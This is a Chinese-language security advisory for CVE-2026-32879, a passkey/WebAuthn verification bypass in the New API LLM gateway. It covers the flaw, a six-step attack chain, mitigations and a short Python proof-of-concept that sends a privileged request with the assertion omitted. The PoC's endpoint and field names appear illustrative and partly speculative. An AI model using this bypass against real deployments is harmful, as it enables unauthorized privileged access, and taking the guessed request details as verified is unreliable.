CVE-2026-32879 CVSS 4.9 中危

CVE-2026-32879 New API安全验证绕过漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32879

漏洞类型

认证绕过

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

New API

漏洞概述

New API是一个大型语言模型网关和AI资产管理系统。在0.10.0及后续版本中，系统的通用安全验证流程存在严重的逻辑缺陷。该漏洞允许已注册通行密钥的认证用户，无需完成完整的WebAuthn断言过程即可满足安全验证要求。攻击者可利用此漏洞绕过强身份验证机制，直接执行特权操作，导致敏感信息泄露。截至披露时，官方尚未发布修复补丁。

技术细节

该漏洞源于New API通用安全验证流程中的逻辑设计缺陷。在涉及特权操作的安全验证机制中，系统本应要求用户通过WebAuthn协议进行断言，即证明拥有私钥对应的通行密钥。然而，由于代码逻辑判断错误，系统仅检查了用户账户是否注册过通行密钥，而未严格验证用户是否实际提供了有效的WebAuthn签名响应。这导致拥有高权限且已注册通行密钥的认证攻击者，可以在物理不持有通行密钥设备的情况下，通过构造特定的请求参数欺骗服务器，使其认为验证流程已成功完成。攻击者利用此逻辑绕过机制，即可访问受安全验证保护的高敏感度端点，从而获取机密信息，且整个过程无需用户交互，隐蔽性较高。

攻击链分析

STEP 1

攻击者注册New API账户并完成通行密钥的注册配置，满足高权限认证条件。

STEP 2

攻击者尝试访问或执行受安全验证保护的特权端点或操作。

STEP 3

服务器触发通用安全验证流程，要求用户提供WebAuthn断言。

STEP 4

攻击者利用逻辑缺陷，向服务器发送验证请求，但省略或伪造WebAuthn断言数据。

STEP 5

服务器仅检查用户是否注册过通行密钥，未验证断言有效性，错误地认为验证通过。

STEP 6

攻击者成功绕过验证，获取到机密信息或执行了特权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "https://target-new-api.com/api/secure/action"
session_cookie = "valid_session_token_here"

headers = {
    "Cookie": f"session={session_cookie}",
    "Content-Type": "application/json"
}

# The vulnerability allows satisfying the secure check without the WebAuthn assertion.
# Exploit payload attempting to bypass the verification step.
payload = {
    "action": "privileged_operation",
    "verification_method": "passkey",
    # Normally a valid 'webauthn_assertion' is required here,
    # but due to the logic flaw, omitting it or sending an incomplete one
    # might satisfy the check if the user has a passkey registered.
    "webauthn_assertion": None 
}

try:
    response = requests.post(target_url, json=payload, headers=headers, verify=False)
    if response.status_code == 200:
        print("[+] Exploit successful! Action executed.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

New API >= 0.10.0

防御指南

临时缓解措施

在官方发布补丁前，建议立即停止将通行密钥作为特权安全验证的升级方法。对于关键操作，应强制要求使用TOTP或其他形式的二次验证（2FA）。如果可能，应临时限制对受安全验证保护端点的网络访问，仅允许可信IP访问，以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表